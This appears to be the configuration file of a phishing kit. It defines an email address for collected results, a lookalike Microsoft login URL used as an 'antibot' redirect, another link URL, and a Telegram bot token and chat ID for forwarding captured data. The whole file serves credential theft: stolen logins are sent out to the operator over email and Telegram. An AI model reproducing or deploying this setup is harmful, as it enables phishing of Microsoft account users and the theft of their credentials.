MAIL_RESULT=binhhnvac@gmail.com
LINK_URL=https://login.fuck.com/SiXnclAT
LINK_ANTIBOT=https://microsoftonline.development-to.online/login/
TOKEN=6234271836:AAFZ5SsDaWUe17yYeMyNylLwqnE_3Fnu5gw
CHAT_ID=5860822009
